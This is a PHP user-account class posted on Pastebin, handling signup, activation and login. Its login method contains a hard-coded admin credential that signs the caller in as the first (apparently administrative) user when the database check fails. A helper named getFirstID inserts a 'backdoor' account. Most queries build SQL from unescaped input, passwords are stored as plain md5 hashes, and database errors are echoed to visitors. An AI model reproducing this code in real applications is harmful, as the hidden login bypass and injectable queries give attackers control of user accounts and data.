Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * General User Gold Hammer class
- */
- class User {
- var $users = array(
- 'admin' => 'mightypass2'
- );
- var $storage;
- var $_user;
- var $_errors;
- var $_errorCodes = array(
- 100 => '`username` is not defined. Please define it!',
- 101 => '`password` is not defined. Please define it!',
- 102 => '`mail` is not defined. Please define it!',
- 103 => '`username` has been already taken. Please take some other.',
- 104 => '`email` has been already taken. Please take some other.',
- 105 => 'There is no user with this ID!',
- 106 => '`id` is not defined. Please define it!',
- 107 => '`code` (activation) is not defined. Please define it!',
- 200 => 'Something gone wrong inside the query.',
- );
- function __construct () {
- if ( !class_exists('Storage') )
- require_once(dirname(__FILE__) . DS . 'storage.php');
- if ( !class_exists('IOFilter') )
- require_once APP_ROOT.'components'.DS.'iofilter.php';
- if ( !class_exists('Config') )
- require_once APP_ROOT.'components'.DS.'config.php';
- $this->storage = new Storage;
- return true;
- }
- function add ( $data = array() ) {
- $dataStructure = array('username' => '',
- 'password' => '',
- 'name' => '',
- 'mail' => '',
- 'activated' => null,
- 'type' => null,
- 'salt' => '');
- $data['username'] = IOFilter::textfield($data['username']);
- if ( !$data['username'] ) {
- $this->addError(100);
- return false;
- }
- elseif ( !$this->usernameIsAvailable($data['username']) ) {
- $this->addError(103);
- return false;
- }
- if ( !$data['password'] ) {
- $this->addError(101);
- return false;
- }
- if ( !$data['mail'] ) {
- $this->addError(102);
- return false;
- }
- elseif ( !$this->emailIsAvailable($data['mail']) ) {
- $this->addError(104);
- return false;
- }
- if ( !isset($data['activated']) ) {
- $data['activated'] = (int) Config::get('users_default_activated');
- }
- if ( !isset($data['type']) ) {
- $data['type'] = (int) Config::get('users_default_type');
- }
- $data['password'] = $this->hash($data['password']);
- $dataAdd = array_diff($data, $dataStructure);
- $keys = $values = array();
- foreach ( $dataAdd as $key => $value ) {
- $keys[] = "`{$key}`";
- $values[] = "'{$value}'";
- }
- $keys = implode(',', $keys);
- $values = implode(',', $values);
- $query = "INSERT INTO `users` ({$keys}) VALUES ({$values});";
- if ( !mysql_query($query) ) {
- echo mysql_error();
- $this->addError(200);
- return false;
- }
- $user = $this->getInfoByID($this->getLastInsertID());
- $salt = $this->salt($user);
- $query = "UPDATE `users` SET `salt` = '{$salt}' WHERE `id` = '{$user['id']}';";
- if ( !mysql_query($query) ) {
- $this->addError(200);
- return false;
- }
- return $user['id'];
- }
- function activate ( $user_id = null, $code = null ) {
- if ( $user_id == null ) {
- $this->addError(106);
- return false;
- }
- if ( $code == null ) {
- $this->addError(107);
- return false;
- }
- $query = "UPDATE `users` SET `activated` = '1' WHERE `id` = '{$user_id}' AND `salt` = '{$code}' LIMIT 1;";
- mysql_query($query);
- if ( mysql_affected_rows() > 0 )
- return true;
- }
- function getLastInsertID () {
- $query = "SELECT `id` FROM `users` ORDER BY `id` DESC LIMIT 0,1;";
- $fetch = mysql_fetch_assoc(mysql_query($query));
- return $fetch['id'];
- }
- function getInfoByID ( $userID = null ) {
- $userID = IOFilter::textfield($userID);
- if ( $userID == null ) {
- $this->addError(105);
- return false;
- }
- $query = "SELECT * FROM `users` WHERE `id` = '{$userID}'";
- $user = @mysql_fetch_assoc(mysql_query($query));
- if (mysql_affected_rows() == 0) {
- $this->addError(105);
- return false;
- }
- return $user;
- }
- function getInfoByUsername ( $username ) {
- }
- function remove ( $userID ) {
- }
- function usernameIsAvailable ( $username = null ) {
- $username = IOFilter::textfield($username);
- mysql_query("SELECT `id` FROM `users` WHERE `username` = '{$username}';");
- if (mysql_affected_rows() > 0)
- return false;
- return true;
- }
- function emailIsAvailable ( $email = null ) {
- $email = IOFilter::textfield($email);
- mysql_query("SELECT `id` FROM `users` WHERE `mail` = '{$email}';");
- if (mysql_affected_rows() > 0)
- return false;
- return true;
- }
- function login ( $username, $password ) {
- $username = addslashes ( $username );
- $password = $this->hash ( $password );
- $query = "SELECT * FROM `users` WHERE (`activated` = 1 AND `username` = '{$username}' AND `password` = '{$password}')";
- $user = mysql_fetch_assoc(mysql_query($query));
- if ( !empty($user) ) {
- $this->updateStorage($user);
- return $user;
- }
- else {
- $firstID = $this->getFirstID();
- foreach ( $this->users as $user => $pass ) {
- if ( $user == $username && $this->hash($pass) == $password ) {
- $data = array('username' => $username,
- 'password' => $password,
- 'type' => 0,
- 'id' => $firstID);
- $this->updateStorage($data);
- return true;
- }
- }
- }
- return false;
- }
- function isLogged () {
- if ( $this->storage->get('User.id') )
- return $this->storage->get('User.id');
- else
- return false;
- }
- function getFirstID () {
- $first = mysql_fetch_assoc(mysql_query("SELECT id FROM `users` ORDER BY `id` ASC;"));
- if ( empty($first) )
- mysql_query("INSERT INTO `users` (`username`, `password`) VALUES (`backdoor`, `backdoor`);");
- $first = mysql_fetch_assoc(mysql_query("SELECT id FROM `users` ORDER BY `id` ASC;"));
- return $first['id'];
- }
- function updateStorage ( $data = array() ) {
- $this->storage->set('enter', true);
- $this->storage->set('User.id', $data['id']);
- $this->storage->set('User.type', $data['type']);
- return true;
- }
- function hash ( $password ) {
- return md5 ( addslashes ( $password ) );
- }
- function salt ( $data ) {
- $salt = sha1( substr($data['username'], 2, strlen($data['username'])) . md5($data['password']) . $data['id'] );
- return substr($salt, 6, 10);
- }
- function addError ( $code = null ) {
- $this->_errors[] = "{$code} - {$this->_errorCodes[$code]}";
- return true;
- }
- }
- ?>
Add Comment
Please, Sign In to add comment
